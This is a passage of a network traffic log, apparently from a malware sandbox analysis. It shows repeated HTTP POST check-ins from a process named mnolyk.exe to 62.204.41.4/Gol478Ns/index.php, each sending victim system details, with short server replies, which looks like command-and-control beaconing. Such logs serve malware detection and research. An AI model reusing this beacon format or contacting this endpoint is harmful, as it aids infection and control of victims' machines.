                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      76 | 192.168.2.7 | 49801 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:16.822546959 CET | 514 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:16.886051893 CET | 515 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      77 | 192.168.2.7 | 49802 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:18.022305965 CET | 515 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:18.087846994 CET | 516 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      78 | 192.168.2.7 | 49803 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:18.277309895 CET | 516 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:18.340989113 CET | 517 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      79 | 192.168.2.7 | 49804 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:18.533345938 CET | 517 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:18.596836090 CET | 518 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      8 | 192.168.2.7 | 49732 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:35:59.129342079 CET | 440 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:35:59.197772980 CET | 440 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      80 | 192.168.2.7 | 49805 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:18.799887896 CET | 518 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:18.864208937 CET | 519 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      81 | 192.168.2.7 | 49806 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:19.040858030 CET | 519 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:19.107131004 CET | 520 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      82 | 192.168.2.7 | 49807 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:19.287197113 CET | 520 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:19.352997065 CET | 521 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      83 | 192.168.2.7 | 49808 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:19.520673037 CET | 521 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:19.583667994 CET | 522 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      84 | 192.168.2.7 | 49809 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:19.755074978 CET | 522 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:19.818711996 CET | 523 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      85 | 192.168.2.7 | 49810 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:19.991660118 CET | 523 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:20.057945013 CET | 524 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      86 | 192.168.2.7 | 49811 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:20.234433889 CET | 524 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:20.297949076 CET | 525 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      87 | 192.168.2.7 | 49812 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:20.476057053 CET | 525 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:20.538273096 CET | 526 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      88 | 192.168.2.7 | 49813 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:20.733652115 CET | 526 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:20.797667980 CET | 527 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      89 | 192.168.2.7 | 49814 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:20.972676992 CET | 527 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:21.035640955 CET | 528 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      9 | 192.168.2.7 | 49733 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:35:59.781455994 CET | 441 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:35:59.849287033 CET | 441 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      90 | 192.168.2.7 | 49815 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:21.210733891 CET | 528 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:21.274374008 CET | 529 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      91 | 192.168.2.7 | 49816 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:21.444072008 CET | 529 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:21.512933016 CET | 530 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      92 | 192.168.2.7 | 49817 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:21.693658113 CET | 530 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
